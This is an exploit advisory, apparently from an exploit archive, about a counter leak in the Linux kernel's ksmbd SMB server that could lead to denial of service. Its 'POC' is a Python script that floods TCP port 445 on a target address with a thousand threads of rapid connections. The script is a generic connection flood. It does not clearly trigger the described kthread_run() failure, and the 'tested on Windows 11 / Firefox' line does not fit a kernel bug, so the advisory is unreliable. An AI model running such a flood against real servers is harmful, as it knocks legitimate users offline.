=============================================================================================================================================
| # Title     : Linux Kernel 5.x ksmbd: active_num_conn Counter Leak via kthread_run() Failure                                              |
| # Author    : indoushka                                                                                                                   |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)                                                            |
| # Vendor    : System built‑in component                                                                                                   |
=============================================================================================================================================

[+] Summary    : A vulnerability in the Linux kernel’s ksmbd component caused a logical resource accounting issue when handling new TCP connections.
                 Within ksmbd_tcp_new_connection(), the internal counter active_num_conn was incremented when a new connection was initiated. 
				 However, if kthread_run() failed during thread creation, the error path invoked free_transport(), which did not decrement active_num_conn.
                 This resulted in a counter leak, where failed connection attempts could artificially inflate the active connection count. Over time, 
				 this inconsistency could prevent legitimate clients from connecting, potentially leading to a Denial of Service (DoS) condition.
                 The issue was resolved by replacing free_transport() with ksmbd_tcp_disconnect(), ensuring proper decrement of active_num_conn during cleanup and restoring correct resource accounting behavior within the Linux kernel.

kernel version is:

5.x
6.1.x
6.5.x
6.6.0–6.6.124
				 
[+] POC   :  

import socket
import threading
import time

TARGET_IP = "192.168.1.100"
TARGET_PORT = 445
MAX_THREADS = 1000  

def stress_worker():
    """
    Worker function to flood the target with rapid connection/disconnection cycles.
    """
    while True:
        try:

            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
            s.settimeout(1) 
            s.connect((TARGET_IP, TARGET_PORT))
            s.send(b"\x00") 
            s.close()
            
        except socket.error:
            time.sleep(0.01)
        except Exception:
            pass

def monitor_and_launch():
    """
    Initializes and monitors the thread pool.
    """
    print(f"[*] Starting stress test on {TARGET_IP}:{TARGET_PORT}...")
    threads = []
    
    for i in range(MAX_THREADS):
        t = threading.Thread(target=stress_worker)
        t.daemon = True 
        t.start()
        threads.append(t)
        
        if i % 100 == 0:
            print(f"[+] Launched {i} threads...")

    try:
        while True:
            time.sleep(1)
    except KeyboardInterrupt:
        print("\n[!] Stress test stopped by user.")

if __name__ == "__main__":
    monitor_and_launch()
	
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================